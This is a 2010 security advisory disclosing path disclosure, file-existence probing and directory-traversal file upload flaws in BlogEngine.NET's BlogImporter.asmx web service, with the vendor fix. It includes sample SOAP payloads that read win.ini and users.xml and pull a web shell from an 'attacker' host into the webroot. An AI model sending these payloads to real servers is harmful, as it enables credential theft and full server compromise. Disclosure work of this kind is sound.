Product: BlogEngine.NET
Vendor informed: 24 Sep 2010
Fixed Version Released: 01 Jan 2011
Affected Versions: 1.6.x and prior versions
Severtiy: Critical
Impact: Information Discloure and System Compromise

Description:

BlogEngine.NET is an open source .NET blogging project that was born
out of desire for a better blog platform. A blog platform with less
complexity, easy customization, and one that takes advantage of the
latest .NET features. We discovered several security problems in
/api/BlogImporter.asmx web service which comes with default
BlogEngine.NET installation.

1- Path Disclose - Several functions of blogimporter.asmx such as
AddComment or AddPost may reveal local path information of
applications stored. A remote user can use this info to determine the
full path of the web root directory.

2- Unauthorized Access - "Source" parameter of GETFILE function may
allow to access the files outside of the webroot directory. Attackers
can use this problem to identify whether file is exist or not, or
finding locations of system/configuration files such as win.ini,
web.config etc. If the file exists in the requested path, application
returns "true", if not exists application returns "false" messages in
the http response. Sample portion of SOAP request which is causing the
problem is as below.

    <GetFile xmlns="http://dotnetblogengine.net/">
      <source>c:\Windows\win.ini</source>
      <destination>string</destination>
    </GetFile>

3- Directory Traversal and File Upload – "destination" parameter of
GETFILE function prone to directory traversal attack with /../../
sequence. Using this problem it is possible to upload files from
remote sites to outsite of the App_Data/files directory which is
normally cannot be accessible by web users, open important local
configuration files (such as web.config, or App_Data/users.xml),
seeing source code of applications, execute os commands via uploaded
applications. This problem may allow an unauthorized users to fully
compromise the target system.

    <GetFile xmlns="http://dotnetblogengine.net/">
      <source>c:\webroot\blog\App_Data\users.xml</source>
      <destination>../../aa.txt</destination>
    </GetFile>

    <GetFile xmlns="http://dotnetblogengine.net/">
      <source>http://attacker/evil.aspx</source>
      <destination>/../../cmd.aspx</destination>
    </GetFile>

Solution:

Upgrade to BlogEngine.Net 2.0 or remove /api/BlogImpoter.asmx.

Deniz CEVIK
Best Regards